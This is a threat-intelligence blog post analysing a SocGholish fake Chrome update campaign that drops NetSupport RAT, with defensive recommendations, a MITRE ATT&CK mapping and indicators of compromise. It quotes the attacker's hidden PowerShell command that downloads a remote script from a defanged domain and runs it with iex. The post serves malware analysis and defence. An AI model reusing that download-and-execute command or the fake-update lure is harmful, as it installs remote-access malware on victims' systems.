New Drive-by Download Campaign Spying on Users
SocGholish is a JavaScript malware framework that has been active since 2017. The term “Soc” in “SocGholish” refers to the use of social engineering toolkits masquerading as software updates to deploy malware on a victim’s system.
This malware framework uses several social engineering themes that impersonate browser and program updates such as Chrome/Firefox, Flash Player, and Microsoft Teams.
Threat Actors (TAs) host a malicious website (the site displays content to lure end-users with critical browser updates) that implements a drive-by-download mechanism, such as JavaScript code or Uniform Resource Locator (URL) redirections, to download an archive file that contains malware.
Being infected with SocGholish may result in the deployment of malware such as Cobalt Strike framework, ransomware, Information Stealers, RATs, etc.
The below figure depicts the infection chain used by the SocGholish framework.
Figure 1 – Infection chain of SocGholish
Technical Analysis
The infection chain begins once a user visits a compromised website that contains an injected HTML code which redirects them to a fake Chrome browser page to lure them into updating their Chrome application.
Once the user clicks the “Update” button on the fake page, an archive file named “Сhrome.UpdĐ°te.zip” is downloaded and saved in the “Downloads” folder.
The below figure shows a fake Chrome browser update page and the downloaded zip archive file.
The downloaded zip archive file contains a heavily-obfuscated JavaScript file named “AutoUpdater.js” as shown below.
Upon execution of the JavaScript file, it further launches a PowerShell command to download and execute an additional PowerShell script from the remote server.
The JavaScript uses following PowerShell command to download a new PowerShell script and invokes it using Invoke-Expression (iex).
- “C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe” -w h -c “iwr -usebasicparsing hxxp://aeoi[.]pl/15.ico |iex”
The new PowerShell script contains Base64-encoded streams which are decoded using [System.Convert]::FromBase64String method, and then performs gzip decompression operation using the [System.IO.Compression.CompressionMode]::Decompress method as shown below.
This decompressed Base64-decoded data contains the embedded payloads and contains code to drop the “NetSupport RAT” application named “whost.exe” with its supporting files saved under the %Appdata% directory, after which “whost.exe” is executed. The below figure shows the NetSupport client application along with its associated files.
After dropping the payload, the PowerShell script creates a run entry to ensure the executable “whost.exe” starts whenever the user logs onto the machine.
The below figure shows the registry key created to establish persistence of the NetSupport client “whost.exe”.
NetSupport Manager RAT
NetSupport Manager is a commercially available RAT (Remote Administration Tool), typically used for legitimate reasons that gives administrators remote access to user’s computers. However, the legitimate application can also be abused by TAs to gain unauthorized access to compromised systems.
Upon execution of the “NetSupport RAT”, it attempts to identify the victim’s geo-location by contacting the following URL:
- hxxp://geo.netsupportsoftware[.]com/location/loca[.]asp
We also observed that the installed RAT sends victim information in an encrypted format with POST requests to the following Command-and-Control server URL:
- hxxp://149.248.8[.]148/fakeurl[.]htm
The figure below shows the network communication established to send the victim’s information to the TA’s C&C server.
After compromising a victim machine, the TAs can perform several malicious activities such as monitoring the victim’s system, transferring files, launching applications, identifying the system location, remotely retrieving inventory and system information, etc.
Conclusion
Threat Actors use various techniques to deploy their malicious payloads into victim systems. Over the course of our research, we observed that TAs using Fake Browser Update (SocGholish) to deliver the NetSupport RAT.
While downloading files from internet, users should confirm whether the downloaded content originated from a legitimate source and not from any suspicious sites. Software applications such as web browsers will typically notify users about updates within the application itself and avoid updates via any third-party websites.
Cyble Research & Intelligence Labs actively monitors new malicious campaigns and keep our readers updated with our latest findings.
Our Recommendations
- Refrain from opening untrusted links and email attachments without first verifying their authenticity.
- Educate employees in terms of protecting themselves from threats like phishing’s/untrusted URLs.
- Avoid downloading files from unknown websites.
- Use strong passwords and enforce multi-factor authentication wherever possible.
- Turn on the automatic software update feature on your computer, mobile, and other connected devices.
- Use a reputed antivirus and internet security software package on your connected devices, including PC, laptop, and mobile.
- Block URLs that could spread the malware, e.g., Torrent/Warez.
- Monitor the beacon on the network level to block data exfiltration by malware or TAs.
- Enable Data Loss Prevention (DLP) Solutions on the employees’ systems.
MITRE ATT&CK® TechniquesÂ
| Tactic | Technique ID | Technique Name |
| Initial Access | T1189 | Drive-by Compromise |
| Execution | T1204 T1059 T1059 | User Execution JavaScript PowerShell |
| Persistence | T1547 | Registry Run Keys / Startup Folder |
| Privilege Escalation | T1574 T1055 | DLL Side-Loading Process Injection |
| Defence Evasion | T1027 T1497 T1140 | Obfuscated Files or Information Virtualization/Sandbox Evasion Deobfuscate/Decode Files or Information |
| Discovery | T1082 | System Information Discovery |
| Command and Control | T1219 T1105 | Remote Access Software Ingress Tool Transfer |
Indicators of Compromise (IOCs)
| Indicators | Indicator Type | Description |
| d5812e63327b5f5491c1a55c74737540 0af611819cd098c1ff3942431fc327dc75b83344 bad65408eb581fe39ded2637473bd4458b03e183ecc03164d6f8cf683a3e408e | MD5 SHA1 Sha256 | Archive file “Сhrome.UpdĐ°te.zip” |
| dc123142cb787d395814027ff4046842 f4aaa317e23fb5446fc29fdbabfa4f0fc7090f59 520b8a64a11fdfb63d584e11ec1355cba6943cf102501fe4670c6429cdc13a61 | MD5 SHA1 Sha256 | Archive file “Сhrome.Updаte.zip” |
| 606df8a69873fcc00754a6bb245ab5ae 6842a4b32aa6a80c75bed4cdf09235c9a5f7e87b 6f0fac3b955e63f25bd199ec373c677152212fceda20d8bc6672cf62e68482e8 | MD5 SHA1 Sha256 | JavaScript file “AutoUpdater.js” |
| eca593e95d2e919fb4b5f55b62b663df 406d6f811df8c0f9a16a36117be6772f25fcb214 1455c4250fea9a6a589ea23a60e130ab3f414a510d63cbf4eaf5693012d6272d | MD5 SHA1 Sha256 | JavaScript file “AutoUpdater.js” |
| dad848c52d27ed20002825df023c4d7c 48e49867904d83b35361d6c5f809d16bc251f334 4a59ac7ae76abb86ab2e035adbe5253247a2aad9b1ce9f59b3145333e34c26f7 | MD5 SHA1 Sha256 | PS1 file “15.ico.ps1” |
| 252dce576f9fbb9aaa7114dd7150f320 c07f0a02c284b697dff119839f455836be39d10e b6b51f4273420c24ea7dc13ef4cc7615262ccbdf6f5e5a49dae604ec153055ad | MD5 SHA1 Sha256 | EXE file “whost.exe” |
| hxxp://aeoi[.]pl/15.ico | URL | C&C server |
| hxxp://aeoi[.]pl/21.ico | URL | C&C server |
| 149.248.8.148 | IP | C&C server |
| 94.158.247.32 | IP | C&C server |
Comments are closed.